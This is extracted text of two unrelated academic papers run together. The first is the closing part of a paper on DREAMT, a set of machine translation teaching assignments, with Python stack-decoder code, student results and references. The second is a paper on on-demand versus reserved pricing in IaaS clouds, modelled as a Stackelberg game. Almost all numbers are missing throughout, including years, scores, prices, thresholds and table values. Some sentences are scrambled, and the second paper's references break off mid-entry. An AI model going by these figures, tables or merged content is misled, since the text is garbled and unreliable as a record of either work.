note that this formulation is different from the typical viterbi objective of standard beam search decoders, which do not sum over all alignments, but approximate p(e|f) by max_a p(e, a|f). though the computation in equation ( ) is intractable (denero and klein, ), it can be computed in a few minutes via dynamic programming on reasonably short sentences. we ensured that our data met this criterion. the corpus-level probability is then the product of all sentence-level probabilities in the data. the model includes no distortion limit or distortion model, for two reasons. first, leaving out the distortion model slightly simplifies the implementation, since it is not necessary to keep track of the last word translated in a beam decoder; we felt that this detail was secondary to understanding the difficulty of search over phrase permutations. second, it actually makes the problem more difficult, since a simple distance-based distortion model prefers translations with fewer permutations; without it, the model may easily prefer any permutation of the target phrases, making even the viterbi search problem exhibit its true np-hardness (knight, a; zaslavskiy et al., ).
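to make the scoring in equation ( ) concrete, the sketch below computes the log-probability of a single derivation — one segmentation of f into phrases, each paired with an english phrase, in english order — under a phrase table and trigram language model. it is an illustration written for this description rather than the distributed grade program, and the interfaces assumed here are not from the assignment: tm maps a (french phrase, english phrase) pair to log p(f | e), and lm exposes begin(), score(state, word), and end(state) as in the decoder listing shown later.

    def derivation_logprob(derivation, tm, lm):
        # derivation: list of (f_phrase, e_phrase) pairs covering the french
        # sentence exactly once, in the order the english output is produced.
        logprob = 0.0
        lm_state = lm.begin()                      # state for the two start symbols
        for (f_phrase, e_phrase) in derivation:
            logprob += tm[(f_phrase, e_phrase)]    # log p(f_phrase | e_phrase)
            for word in e_phrase.split():
                (lm_state, word_logprob) = lm.score(lm_state, word)
                logprob += word_logprob            # log p(e_j | e_{j-1}, e_{j-2})
        logprob += lm.end(lm_state)                # end-of-sentence symbol
        return logprob

summing this quantity over every derivation of the same english sentence yields equation ( ); the corpus-level log-probability is then the sum of the sentence-level values.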
since the goal was to find the translation with the highest probability, we did not provide a held-out test set; with access to both the input sentences and the model, students had enough information to compute the evaluation score on any dataset themselves. (for simplicity, the formula in equation ( ) assumes that e is padded with two sentence-initial symbols and one sentence-final symbol, and ignores the probability of sentence segmentation, which we take to be uniform.) the difficulty of the challenge lies simply in finding the translation that maximizes the evaluation. indeed, since the problem is intractable, even the instructors did not know the true solution.

. data

we chose french sentences totaling words from the canadian hansards to serve as test data. to create a simple translation model, we used the berkeley aligner to align the parallel text from the first assignment, and extracted a phrase table using the method of lopez ( ), as implemented in cdec (dyer et al., ). to create a simple language model, we used srilm (stolcke, ).

. implementation

we distributed two python programs. the first, decode, decodes the test data monotonically—using both the language model and translation model, but without permuting phrases. the implementation is completely self-contained with no external dependencies: it implements both models and a simple stack decoding algorithm for monotonic translation. it contains only lines of python—orders of magnitude fewer than most full-featured decoders. to see its similarity to pseudocode, compare the decoding algorithm (listing ) with the pseudocode in koehn's ( ) popular textbook (reproduced here as algorithm ). the second program, grade, computes the log-probability of a set of translations, as outlined above.

we privately implemented a simple stack decoder that searched over permutations of phrases, similar to koehn ( ). our implementation increased the codebase by lines of code and included parameters for beam size, distortion limit, and the maximum number of translations considered for each input phrase. we posted a baseline to the leaderboard using values of , , and for these, respectively. (we also implemented a version of the lagrangian relaxation algorithm of chang and collins ( ), but found it difficult to obtain tight, optimal solutions without iteratively reintroducing all of the original constraints; we suspect this is due to the lack of a distortion penalty, which would otherwise enforce a strong preference towards translations with little reordering. note also that the solution found by this algorithm only approximates the objective implied by equation ( ), which sums over alignments.) we also posted an oracle containing the most probable output for each sentence, selected from among all submissions received so far. the intent of this oracle was to provide a lower bound on the best possible output, giving students additional incentive to continue improving their systems.

. challenge results

we received submissions from teams (figure ), again exhibiting a variety of solutions:

• implementation of a greedy decoder which at each step chooses the most probable translation from among those reachable by a single swap or retranslation (germann et al., ; langlais et al., ).
• inclusion of heuristic estimates of future cost.
• implementation of a private oracle. some students observed that the ideal beam setting was not uniform across the corpus. they ran their decoder under different settings, and then selected the most probable translation of each sentence.
many teams who implemented the standard stack decoding algorithm experimented heavily with its pruning parameters. the best submission used extremely wide beam settings in conjunction with a reimplementation of the future cost estimate used in moses (koehn et al., ). five of the submissions beat moses using its standard beam settings after it had been configured to decode with our model. we used this assignment to emphasize the importance of good models: the model score of the submissions was generally inversely correlated with bleu, possibly because our simple model had no distortion limits. we used this to illustrate the difference between model error and search error, including fortuitous search error (germann et al., ) made by decoders with less accurate search.

figure : submission history for the decoding challenge. the dotted green line represents the oracle over submissions.

listing : the default decoder in dreamt, a stack decoder for monotonic translation.

    stacks = [{} for _ in f] + [{}]
    stacks[0][lm.begin()] = initial_hypothesis
    for i, stack in enumerate(stacks[:-1]):
        for h in sorted(stack.itervalues(), key=lambda h: -h.logprob)[:alpha]:
            for j in xrange(i+1, len(f)+1):
                if f[i:j] in tm:
                    for phrase in tm[f[i:j]]:
                        logprob = h.logprob + phrase.logprob
                        lm_state = h.lm_state
                        for word in phrase.english.split():
                            (lm_state, word_logprob) = lm.score(lm_state, word)
                            logprob += word_logprob
                        logprob += lm.end(lm_state) if j == len(f) else 0.0
                        new_hypothesis = hypothesis(logprob, lm_state, h, phrase)
                        if lm_state not in stacks[j] or \
                           stacks[j][lm_state].logprob < logprob:
                            stacks[j][lm_state] = new_hypothesis
    winner = max(stacks[-1].itervalues(), key=lambda h: h.logprob)

    def extract_english(h):
        return "" if h.predecessor is None else \
            "%s%s " % (extract_english(h.predecessor), h.phrase.english)

    print extract_english(winner)

algorithm : basic stack decoding algorithm, adapted from koehn ( ), p. .

    place empty hypothesis into stack 0
    for all stacks 0 ... n−1 do
        for all hypotheses in stack do
            for all translation options do
                if applicable then
                    create new hypothesis
                    place in stack
                    recombine with existing hypothesis
                    prune stack if too big

the evaluation challenge

the third challenge was evaluation: given a test corpus with reference translations and the output of several mt systems, students were challenged to produce a ranking of the systems that closely correlated with a human ranking.

. data

we chose the english-to-german translation systems from the and shared tasks at the annual workshop on machine translation (callison-burch et al., ; callison-burch et al., ), providing the first as development data and the second as test data. we chose these sets because bleu (papineni et al., ), our baseline metric, performed particularly poorly on them; this left room for improvement in addition to highlighting some deficiencies of bleu. for each dataset we provided the source and reference sentences along with anonymized system outputs. for the development data we also provided the human ranking of the systems, computed from pairwise human judgements according to a formula recommended by bojar et al. ( ).
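the human ranking just mentioned is derived from pairwise judgements. the sketch below shows one common way to turn such judgements into a ranking — each system scored by the fraction of its comparisons that it wins — which is similar in spirit to, but not necessarily identical with, the formula of bojar et al.; the input format (a list of (winner, loser) tuples, ties omitted) is an assumption made for illustration.

    from collections import defaultdict

    def rank_systems(pairwise_judgements):
        # pairwise_judgements: list of (winner, loser) system-name pairs,
        # one per human comparison.
        wins = defaultdict(int)
        comparisons = defaultdict(int)
        for (winner, loser) in pairwise_judgements:
            wins[winner] += 1
            comparisons[winner] += 1
            comparisons[loser] += 1
        # score each system by the fraction of comparisons it won,
        # then sort from best to worst.
        score = {s: float(wins[s]) / comparisons[s] for s in comparisons}
        return sorted(score, key=score.get, reverse=True)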
. implementation

we provided three simple python programs: evaluate implements a simple ranking of the systems based on position-independent word error rate (per; tillmann et al., ), which computes a bag-of-words overlap between the system translations and the reference. the grade program computes spearman's ρ between the human ranking and an output ranking. the check program simply ensures that a submission contains a valid ranking. we were concerned about hill-climbing on the test data, so we modified the leaderboard to report new results only twice a day. this encouraged students to experiment on the development data before posting new submissions, while still providing intermittent feedback. we privately implemented a version of bleu, which obtained a correlation of . with the human rankings, a modest improvement over the baseline of . . our implementation underperforms the one reported in callison-burch et al. ( ) since it performs no tokenization or normalization of the data. this also left room for improvement.

. evaluation challenge results

we received submissions from teams (figure ), again demonstrating a wide range of techniques:

• experimentation with the maximum n-gram length and weights in bleu.
• implementation of smoothed versions of bleu (lin and och, ).
• implementation of a weighted f-measure to balance both precision and recall.
• careful normalization of the reference and machine translations, including lowercasing and punctuation-stripping.
• implementation of several techniques used in amber (chen and kuhn, ).

figure : submission history for the evaluation challenge.

the best submission, obtaining a correlation of . , relied on the idea that the reference and machine translation should be good paraphrases of each other (owczarzak et al., ; kauchak and barzilay, ). it employed a simple paraphrase system trained on the alignment challenge data, using the pivot technique of bannard and callison-burch ( ), and computing the optimal alignment between machine translation and reference under a simple model in which words could align if they were paraphrases. when compared with the systems submitted to the original task from which the data was obtained (callison-burch et al., ), this system would have ranked fifth, quite near the top-scoring competitors, whose correlations ranged from to . (the human ranking used here has been disputed over a series of papers (lopez, ; callison-burch et al., ; koehn, ); the paper which initiated the dispute, written by the first author, was directly inspired by the experience of designing this assignment.)

the reranking challenge

the fourth challenge was reranking: given a test corpus and a large n-best list of candidate translations for each sentence, students were challenged to select a candidate translation for each sentence to produce a high corpus-level bleu score. due to an error in our data preparation, this assignment had a simple solution that was very difficult to improve on. nevertheless, it featured several elements that may be useful for future courses.

. data

we obtained -best lists from a spanish-english translation system built with the joshua toolkit (ganitkevitch et al., ) using data and resources from the workshop on machine translation (callison-burch et al., ). we provided training sentences, consisting of source and reference sentences along with the candidate translations.
we also included a test set of sentences, for which we provided only the source and candidate translations. each candidate translation included six features from the underlying translation system, out of an original ; our hope was that students might rediscover some features through experimentation. . implementation we conceived of the assignment as one in which stu- dents could apply machine learning or feature engi- neering to the task of reranking the systems, so we provided several tools. the first of these, learn, was a simple program that produced a vector of feature weights using pairwise ranking optimization (pro; hopkins and may, ), with a perceptron as the underlying learning algorithm. a second, rerank, takes a weight vector as input and reranks the sentences; both programs were designed to work with arbitrary numbers of features. the grade pro- gram computed the bleu score on development data, while check ensured that a test submission is valid. finally, we provided an oracle program, which computed a lower bound on the achievable bleu score on the development data using a greedy approximation (och et al., ). the leaderboard likewise displayed an oracle on test data. we did not assign a target algorithm, but left the assignment fully open-ended. . reranking challenge outcome for each assignment, we made an effort to create room for competition above the target algorithm. however, we did not accomplish this in the rerank- ing challenge: we had removed most of the features from the candidate translations, in hopes that stu- dents might reinvent some of them, but we left one highly predictive implicit feature in the data: the rank order of the underlying translation system. stu- dents discovered that simply returning the first can- didate earned a very high score, and most of them quickly converged to this solution. unfortunately, the high accuracy of this baseline left little room for additional competition. nevertheless, we were en- couraged that most students discovered this by acci- dent while attempting other strategies to rerank the translations. • experimentation with parameters of the pro algorithm. • substitution of alternative learning algorithms. • implementation of a simplified minimum bayes risk reranker (kumar and byrne, ). over a baseline of . , the latter approach ob- tained a bleu of . , nearly matching the score of . from the underlying system despite an im- poverished feature set. pedagogical outcomes could our students have obtained similar results by running standard toolkits? undoubtedly. however, our goal was for students to learn by doing: they obtained these results by implementing key mt al- gorithms, observing their behavior on real data, and improving them. this left them with much more in- sight into how mt systems actually work, and in this sense, dreamt was a success. at the end of class, we requested written feedback on the design of the assignments. many commented positively on the motivation provided by the challenge problems: • the immediate feedback of the automatic grad- ing was really nice. • fast feedback on my submissions and my rela- tive position on the leaderboard kept me both motivated to start the assignments early and to constantly improve them. also knowing how well others were doing was a good way to gauge whether i was completely off track or not when i got bad results. • the homework assignments were very engag- ing thanks to the clear yet open-ended setup and their competitive aspects. 
students also commented that they learned a lot about mt and even research in general: question n/a feedback on my work for this course is useful - - - this course enhanced my ability to work effectively in a team - - compared to other courses at this level, the workload for this course is high - table : response to student survey questions on a likert scale from (strongly disagree) to (strongly agree). • i learned the most from the assignments. • the assignments always pushed me one step more towards thinking out loud how the par- ticular task can be completed. • i appreciated the setup of the homework prob- lems. i think it has helped me learn how to set up and attack research questions in an or- ganized way. i have a much better sense for what goes into an mt system and what prob- lems aren’t solved. we also received feedback through an anonymous survey conducted at the end of the course before posting final grades. each student rated aspects of the course on a five point likert scale, from (strongly disagree) to (strongly agree). several questions pertained to assignments (table ), and al- lay two possible concerns about competition: most students felt that the assignments enhanced their col- laborative skills, and that their open-endedness did not result in an overload of work. for all survey questions, student satisfaction was higher than av- erage for courses in our department. discussion dreamt is inspired by several different ap- proaches to teaching nlp, ai, and computer sci- ence. eisner and smith ( ) teach nlp using a competitive game in which students aim to write fragments of english grammar. charniak et al. ( ) improve the state-of-the-art in a reading com- prehension task as part of a group project. christo- pher et al. ( ) use nachos, a classic tool for teaching operating systems by providing a rudimen- tary system that students then augment. denero and klein ( ) devise a series of assignments based on pac-man, for which students implement several classic ai techniques. a crucial element in such ap- proaches is a highly functional but simple scaffold- ing. the dreamt codebase, including grading and validation scripts, consists of only lines of code (loc) over four assignments: loc for align- ment, loc for decoding, loc for evalua- tion, and loc for reranking. to simplify imple- mentation further, the optional leaderboard could be delegated to kaggle.com, a company that organizes machine learning competitions using a model sim- ilar to the netflix challenge (bennet and lanning, ), and offers pro bono use of its services for educational challenge problems. a recent machine learning class at oxford hosted its assignments on kaggle (phil blunsom, personal communication). we imagine other uses of dreamt. it could be used in an inverted classroom, where students view lecture material outside of class and work on prac- tical problems in class. it might also be useful in massive open online courses (moocs). in this for- mat, course material (primarily lectures and quizzes) is distributed over the internet to an arbitrarily large number of interested students through sites such as coursera.org, udacity.com, and khanacademy.org. in many cases, material and problem sets focus on spe- cific techniques. although this is important, there is also a place for open-ended problems on which stu- dents apply a full range of problem-solving skills. automatic grading enables them to scale easily to large numbers of students. 
on the scientific side, the scale of moocs might make it possible to empirically measure the effec- tiveness of hands-on or competitive assignments, by comparing course performance of students who work on them against that of those who do not. though there is some empirical work on competi- tive assignments in the computer science education literature (lawrence, ; garlick and akl, ; regueras et al., ; ribeiro et al., ), they generally measure student satisfaction and retention rather than the more difficult question of whether such assignments actually improve student learning. however, it might be feasible to answer such ques- tions in large, data-rich virtual classrooms offered by moocs. this is an interesting potential avenue for future work. because our class came within reach of state-of- the-art on each problem within a matter of weeks, we wonder what might happen with a very large body of competitors. could real innovation oc- cur? could we solve large-scale problems? it may be interesting to adopt a different incentive struc- ture, such as one posed by abernethy and frongillo ( ) for crowdsourcing machine learning prob- lems: rather than competing, everyone works to- gether to solve a shared task, with credit awarded proportional to the contribution that each individual makes. in this setting, everyone stands to gain: stu- dents learn to solve problems as they are found in the real world, instructors learn new insights into the problems they pose, and, in the long run, users of ai technology benefit from overall improvements. hence it is possible that posing open-ended, real- world problems to students might be a small piece of the puzzle of providing high-quality nlp tech- nologies. acknowledgments we are grateful to colin cherry and chris dyer for testing the assignments in different settings and providing valuable feedback, and to jessie young for implementing a dual decomposition solution to the decoding assignment. we thank jason eis- ner, frank ferraro, yoav goldberg, matt gormley, ann irvine, rebecca knowles, ben mitchell, court- ney napoles, michael rushanan, joanne selinski, svitlana volkova, and the anonymous reviewers for lively discussion and helpful comments on previous drafts of this paper. any errors are our own. references j. abernethy and r. m. frongillo. . a collaborative mechanism for crowdsourcing prediction problems. in proc. of nips. c. bannard and c. callison-burch. . paraphrasing with bilingual parallel corpora. in proc. of acl. j. bennet and s. lanning. . the netflix prize. in proc. of the kdd cup and workshop. s. bird, e. klein, e. loper, and j. baldridge. . multidisciplinary instruction with the natural language toolkit. in proc. of workshop on issues in teaching computational linguistics. o. bojar, m. ercegovčević, m. popel, and o. zaidan. . a grain of salt for the wmt manual evaluation. in proc. of wmt. p. e. brown, s. a. d. pietra, v. j. d. pietra, and r. l. mercer. . the mathematics of statistical machine translation: parameter estimation. computational lin- guistics, ( ). c. callison-burch, p. koehn, c. monz, and j. schroeder. . findings of the workshop on statistical machine translation. in proc. of wmt. c. callison-burch, p. koehn, c. monz, and o. zaidan. . findings of the workshop on statistical machine translation. in proc. of wmt. c. callison-burch, p. koehn, c. monz, m. post, r. sori- cut, and l. specia. . findings of the work- shop on statistical machine translation. in proc. of wmt. y.-w. chang and m. collins. . 
exact decoding of phrase-based translation models through lagrangian relaxation. in proc. of emnlp. e. charniak, y. altun, r. de salvo braz, b. garrett, m. kosmala, t. moscovich, l. pang, c. pyo, y. sun, w. wy, z. yang, s. zeiler, and l. zorn. . read- ing comprehension programs in a statistical-language- processing class. in proc. of workshop on read- ing comprehension tests as evaluation for computer- based language understanding systems. b. chen and r. kuhn. . amber: a modified bleu, enhanced ranking metric. in proc. of wmt. d. chiang. . hierarchical phrase-based translation. computational linguistics, ( ). w. a. christopher, s. j. procter, and t. e. anderson. . the nachos instructional operating system. in proc. of usenix. j. denero and d. klein. . the complexity of phrase alignment problems. in proc. of acl. j. denero and d. klein. . teaching introductory articial intelligence with pac-man. in proc. of sym- posium on educational advances in artificial intelli- gence. l. r. dice. . measures of the amount of ecologic association between species. ecology, ( ): – . c. dyer, a. lopez, j. ganitkevitch, j. weese, f. ture, p. blunsom, h. setiawan, v. eidelman, and p. resnik. . cdec: a decoder, alignment, and learning framework for finite-state and context-free translation models. in proc. of acl. j. eisner and n. a. smith. . competitive grammar writing. in proc. of workshop on issues in teaching computational linguistics. a. fraser and d. marcu. . measuring word align- ment quality for statistical machine translation. com- putational linguistics, ( ). j. ganitkevitch, y. cao, j. weese, m. post, and c. callison-burch. . joshua . : packing, pro, and paraphrases. in proc. of wmt. r. garlick and r. akl. . intra-class competitive assignments in cs : a one-year study. in proc. of international conference on engineering education. u. germann, m. jahr, k. knight, d. marcu, and k. ya- mada. . fast decoding and optimal decoding for machine translation. in proc. of acl. l. huang and d. chiang. . forest rescoring: faster decoding with integrated language models. in proc. of acl. m. johnson. . why doesn’t em find good hmm pos-taggers? in proc. of emnlp. d. jurafsky and j. h. martin. . speech and lan- guage processing. prentice hall, nd edition. d. kauchak and r. barzilay. . paraphrasing for automatic evaluation. in proc. of hlt-naacl. d. klein. . a core-tools statistical nlp course. in proc. of workshop on effective tools and methodolo- gies for teaching nlp and cl. k. knight. a. decoding complexity in word- replacement translation models. computational lin- guistics, ( ). k. knight. b. a statistical mt tutorial workbook. p. koehn, f. j. och, and d. marcu. . statistical phrase-based translation. in proc. of naacl. p. koehn, h. hoang, a. birch, c. callison-burch, m. federico, n. bertoldi, b. cowan, w. shen, c. moran, r. zens, c. dyer, o. bojar, a. constantin, and e. herbst. . moses: open source toolkit for statistical machine translation. in proc. of acl. p. koehn. . pharaoh: a beam search decoder for phrase-based statistical machine translation models. in proc. of amta. p. koehn. . statistical machine translation. cam- bridge university press. p. koehn. . simulating human judgment in machine translation evaluation campaigns. in proc. of iwslt. s. kumar and w. byrne. . minimum bayes-risk decoding for statistical machine translation. in proc. of hlt-naacl. p. langlais, a. patry, and f. gotti. . a greedy de- coder for phrase-based statistical machine translation. in proc. of tmi. r. lawrence. . 
teaching data structures using competitive games. ieee transactions on education, ( ). p. liang, b. taskar, and d. klein. . alignment by agreement. in proc. of naacl. c.-y. lin and f. j. och. . orange: a method for evaluating automatic evaluation metrics for machine translation. in proc. of coling. y. liu, q. liu, and s. lin. . discriminative word alignment by linear modeling. computational lin- guistics, ( ). a. lopez. . hierarchical phrase-based translation with suffix arrays. in proc. of emnlp. a. lopez. . statistical machine translation. acm computing surveys, ( ). a. lopez. . putting human assessments of machine translation systems in order. in proc. of wmt. n. madnani and b. dorr. . combining open-source with research to re-engineer a hands-on introductory nlp course. in proc. of workshop on issues in teach- ing computational linguistics. i. d. melamed. . models of translational equiv- alence among words. computational linguistics, ( ). r. mihalcea and t. pedersen. . an evaluation ex- ercise for word alignment. in proc. on workshop on building and using parallel texts. r. c. moore. . improving ibm word alignment model . in proc. of acl. f. j. och and h. ney. . improved statistical align- ment models. in proc. of acl. f. j. och and h. ney. . a systematic comparison of various statistical alignment models. computational linguistics, . f. j. och, d. gildea, s. khudanpur, a. sarkar, k. ya- mada, a. fraser, s. kumar, l. shen, d. smith, k. eng, v. jain, z. jin, and d. radev. . a smorgasbord of features for statistical machine translation. in proc. of naacl. k. owczarzak, d. groves, j. v. genabith, and a. way. . contextual bitext-derived paraphrases in auto- matic mt evaluation. in proc. of wmt. k. papineni, s. roukos, t. ward, and w.-j. zhu. . bleu: a method for automatic evaluation of machine translation. in proc. of acl. l. regueras, e. verdú, m. verdú, m. pérez, j. de castro, and m. muñoz. . motivating students through on-line competition: an analysis of satisfaction and learning styles. p. ribeiro, m. ferreira, and h. simões. . teach- ing artificial intelligence and logic programming in a competitive environment. informatics in education, (vol ): . j. spacco, d. hovemeyer, w. pugh, j. hollingsworth, n. padua-perez, and f. emad. . experiences with marmoset: designing and using an advanced submis- sion and testing system for programming courses. in proc. of innovation and technology in computer sci- ence education. a. stolcke. . srilm - an extensible language mod- eling toolkit. in proc. of icslp. c. tillmann, s. vogel, h. ney, a. zubiaga, and h. sawaf. . accelerated dp based search for statistical translation. in proc. of european conf. on speech communication and technology. m. zaslavskiy, m. dymetman, and n. cancedda. . phrase-based statistical machine translation as a trav- eling salesman problem. in proc. of acl. international journal of advanced network monitoring and controls volume , no. , optimal pricing strategies for resource allocation in iaas cloud zhengce cai a, xianwei li*b,c a department of information service, anhui business college, hefei, china, ; b school of information engineering, suzhou university, suzhou, china, ; c global information and telecommunication institute, waseda university, tokyo, japan email: *lixianwei @ .com abstract. in cloud computing environment, pricing is an effective method for resource allocation and it provides efficient incentive for cloud providers to provide cloud services. 
in this paper, we investigate two pricing schemes for the allocation of cloud resources in a monopoly cloud market subject to constrained capacity of the cloud provider. there are two main pricing schemes, on-demand and reserved pricing mechanisms adopted by leading cloud providers, i.e., amazon and gogrid. we analyze how cloud users make their choice decisions to subscribe to cloud resources under different pricing schemes. keywords: cloud computing, pricing schemes, resource allocation, revenue, utility . introduction cloud computing has received a great deal of attention in both research and engineering fields, and the use of cloud services has become more and more wide. fig . illustrates the application of cloud services [ ]. the definition of cloud computing is an open topic and it can be defined by several ways, one popular recognized definition proposed by buyya et al. [ ] is: computers that are dynamically provisioned and presented as one or more unified computing resources based on “a cloud is a type of parallel and distributed system consisting of a collection of interconnected and virtualized service-level agreements established through negotiation between the service provider and the consumers. cloud services can be categorized into three main types [ ][ ], infrastructure as a service (iaas), software as a service (saas) and platform as a service (paas), among which iaas and saas are more commonly used, therefore, most of the current works focus on study resource allocation in iaas and saas clouds. in iaas cloud context, such as amazon ec , physical resources (memory, disk, and cpu et al) are virtualized into different types of virtual machines (vms), and the computational resources are leased to cloud users in the form of vm instances, as shown in fig . . table i shows some configurations of vm instances in amazon ec . in paas cloud context, such as google app engine, cloud users can develop and run their applications on a computing platform. in saas cloud context, cloud users can access the applications which are delivered over the internet. optimal pricing strategies for resource allocation in iaas cloud the rest of the paper is organized as follows. in the second section, we study optimal pricing for revenue maximization by making use of game theory to investigate the relationship between cloud provider and users. we do simulations to verify our analysis in the third section. conclusions and future works are given in the last section. figure. the uses application of cloud services [ ]. figure. an illustration of iaas cloud . pricing for revenue maximiztion we study optimal pricing for revenue maximization in a monopoly cloud market in this section. first, we analyze how to make choice decision given different prices and pricing schemes of vm instances. then, we will study how to set optimal prices in order to maximize the revenue of cloud providers while meeting cloud users’ satisfactions. . cloud users’ choice with different pricing schemes as illustrated in table ii and table iii, even for the same type of instance, cloud users have to make a decision about how to choose the suitable pricing schemes. in order to help cloud users make right decisions, we first analyze which pricing scheme cloud users should choose. suppose that a cloud user wants to buy t hours to process his/her service requests. take m .small vm instance of amazon ec as an example, the price that he/she has to pay is $ . t, and the reservation price per month is $ . . by setting . t= . 
, we can get t ≈ hours. this means that if total time of the usage of the m .small vm instance are less than hours in one month, it is better for this cloud user to adopt on- demand pricing scheme, otherwise, it is better for this cloud user to adopt reservation pricing scheme. if this cloud user choose to buy the similar type of vm instance in gogrid, for example, x-small, the international journal of advanced network monitoring and controls volume , no. , total money that he/she has to pay is . t under on-demand pricing scheme, and the reservation price is $ . per month, by setting . t= . , we get t ≈ hours. this means that if total time of the usage of the x-small vm instance are less than hours in one month, it is better for this cloud user to adopt on-demand pricing scheme, otherwise, it is better for this cloud user to adopt reservation pricing scheme. we summarize the above analysis results in table iv. fig . further illustrates the adoption option under on-demand and reservation pricing schemes. . cloud users’ decision choices we next study how how to set optimal prices in order to maximize the revenue of cloud providers while meeting cloud users’ satisfactions. assume that there is a cloud provider with total capacity c selling cloud resources in the form of vm instances to a potential number of cloud users, and the price of per vm instance is charged with p $/h under on-demand pricing scheme. each cloud user is denoted by θ, which is uniformly distributed in [ , ]. table configurations of amazon ec vm instances table prices of some amazon ec vm instances instance types cpu storage (gb) memory (gib) m .small . m .large * . m .xlarge . m .xlarge . c . xlarge instance types on-demand pricing(hourly) reservation pricing(monthly) m .small $ . /h $ . /m m .large $ . /h $ . /m m .xlarge $ . /h $ . /m m .xlarge $ . /h $ . /m c . xlarge $ . /h $ . /m optimal pricing strategies for resource allocation in iaas cloud table choice decision for cloud users we model the interactions between cloud providers and users as a stakelberg game [ ], which is illustrated in fig . in the first stage, cloud provider makes their price decisions, and in the second stage, cloud users make their selection decision choices. we make use of the backward method and first analyze cloud users’ decision choices. given the price of that vm instance p, a cloud user that requires xi vm instances will pay pxi, and his/her net benefit can be expressed as θu(xi) – pxi ( ) where u(xi) is the utility that this cloud user gets. we model u(xi) by the following utility function which is widely used in the literature [ ], u(xi)= xiα ( ) where α is an elasticity parameter, which lies in ( , ). fig. illustrates how users’ utilities vary with different values of α. from this figure we can observe that α reflects the elastic demand of this cloud user, that is, the percentage change of demand to the percent change of price, and cloud user will get more utility if the value of the elastic parameter is higher. it is known that the elasticity of the above utility function is /( -α). for the cloud users, they will choose to subscribe cloud resources if and only if their net benefits are nonnegative, which implies that, θxα – px ≥ , ( ) from which we can obtain a critical value θ , and the cloud users whose values are distributed in [ , θ ] will not to subscribe to the cloud resources, and the users whose values are distributed in [θ , ] will choose to use the cloud services. 
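as a concrete reading of this participation condition, the sketch below — an illustration written for this discussion, not code from the paper, with placeholder numbers — evaluates a type-θ user's net benefit θ·u(x) − p·x for a required number of instances x and computes the critical type θ0 = p·x^(1−α) at which the net benefit is exactly zero; users with θ below θ0 stay out, which is the threshold separating the two intervals described above.

    def utility(x, alpha):
        # u(x) = x**alpha with 0 < alpha < 1, as in the text
        return x ** alpha

    def net_benefit(theta, x, p, alpha):
        # net benefit of a type-theta user requiring x instances at price p each
        return theta * utility(x, alpha) - p * x

    def critical_type(x, p, alpha):
        # smallest theta with nonnegative net benefit:
        # theta * x**alpha - p * x >= 0  <=>  theta >= p * x**(1 - alpha)
        return p * x ** (1.0 - alpha)

    # placeholder example (all values assumed): a user needing x = 4 instances
    # at p = 0.06 per instance-hour with alpha = 0.5
    x, p, alpha = 4, 0.06, 0.5
    theta0 = critical_type(x, p, alpha)
    print(theta0, net_benefit(theta0, x, p, alpha))   # net benefit is zero at theta0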
the cloud user's problem can be expressed as

    \max_{x} \; θ u(x) - p x \quad \text{s.t.} \quad x \ge 0    ( )

    instance type | hourly (on-demand)  | monthly (reservation)
    m .small      | usage < hours       | usage ≥ hours
    x-small       | usage < hours       | usage ≥ hours
    medium        | usage < hours       | usage ≥ hours
    large         | usage < hours       | usage ≥ hours
    x-large       | usage < hours       | usage ≥ hours

figure : illustration of the adoption option.

figure : stackelberg game in the monopoly cloud market.

. cloud provider's pricing decision

in this subsection we study how to set optimal prices in order to maximize the revenue of the cloud provider while meeting cloud users' satisfaction. pricing provides an economic incentive for cloud providers and it ensures the success of cloud computing. for the cloud provider, the objective is to maximize its revenue, which is the total payment from cloud users. the cloud provider's problem can be formulated as follows,

    \max \; π = \sum_{i=1}^{n} p \, x_i    ( )
    \text{s.t.} \quad \sum_{i=1}^{n} x_i \le C, \quad θ_i u(x_i) - p x_i \ge 0, \quad x_i \ge 0

the first constraint of problem ( ) ensures that the total number of vm instances does not exceed the capacity of the cloud provider, and the second constraint makes sure that cloud users' net benefits are nonnegative. from the second constraint of problem ( ), we can see that p x_i = θ_i u(x_i) should hold at the optimum; otherwise, the cloud provider could increase the price of this type of vm instance. therefore, we can transform problem ( ) into an equivalent problem,

    \max \; π = \sum_{i=1}^{n} θ_i u(x_i)    ( )
    \text{s.t.} \quad \sum_{i=1}^{n} x_i \le C, \quad x_i \ge 0

now we have the cloud provider's revenue maximization problem, and we will do simulations to verify our analysis in the next section.

. simulation results

in this section, we do simulations to verify our analysis in the previous section. we first analyze users' decision choices, and then analyze the cloud provider's revenue problem.

. cloud users' utilities

we first analyze how sensitive cloud users are to the prices of cloud resources. fig. illustrates how cloud users' net benefits vary with different values of θ with x = , p = . and α = / . we can observe from fig. that not all cloud users obtain a positive net benefit; therefore, some cloud users may choose not to subscribe to the cloud resources. the parameter θ reflects a cloud user's willingness to pay, which means that users with a higher value of θ are more willing to use cloud services. fig. illustrates how a cloud user's net benefit varies with the price charged by the cloud provider, with θ and the other parameters set the same as in fig. . we can observe that as the price increases, the net benefit of this cloud user decreases; this implies that in order to encourage cloud users to use cloud services, cloud providers should set the prices of cloud resources properly, otherwise high prices will discourage cloud users from paying to use cloud services.

. conclusions and future works

we studied resource allocation in a monopoly cloud market. we analyzed the choice decisions of cloud users in the amazon ec and gogrid clouds, and pointed out the right choice for cloud users when facing on-demand and reservation pricing schemes. we not only analyzed how cloud users' utilities and net benefits vary with different types of cloud users and different numbers of vm instances, but also analyzed how the revenue of the cloud provider varies with different prices and different numbers of vm instances.
future works will include resource allocation in a duopoly or oligopoly cloud market where there are more than one cloud providers. figure. how cloud users’ utilities vary with different values of α. international journal of advanced network monitoring and controls volume , no. , figure. how cloud users’ net benefits vary with different values of θ. figure. how cloud users’ net benefits vary with price of cloud resources p. . cloud provider’s revenue problem we next analyze how the cloud provider sets its prices in order to maximize its revenue. from eqs. ( ) and ( ) we know that the revenue of cloud provider is affected by cloud users’ choices, and we transform the revenue function into a function associated with cloud users’ utilities. fig. shows that the revenue of the cloud provider varies with different number of vm instances, and the revenue will be higher if the price is set higher with the same number of vm instances. fig. shows that cloud users are more willing to subscribe cloud services if they have higher values for using cloud services, and if cloud users have more elastic demand for cloud services, cloud provider will get more revenue. the above analysis imply that cloud provider can set higher prices for these cloud users who are more willing to pay and who have higher elastic demands. figure. the revenues of cloud provider vary with different number of vm instances. optimal pricing strategies for resource allocation in iaas cloud figure. the revenues of cloud provider vary with different cloud users’ types. acknowledgment this paper is supported by the following projects, anhui key research projects of humanities and social sciences (sk a ), and suzhou regional collaborative innovation center ( szxt ). references [ ] j. mei, k. li, a. ouyang et al. “a profit maximization scheme with guaranteed quality of service in cloud computing,” in press. [ 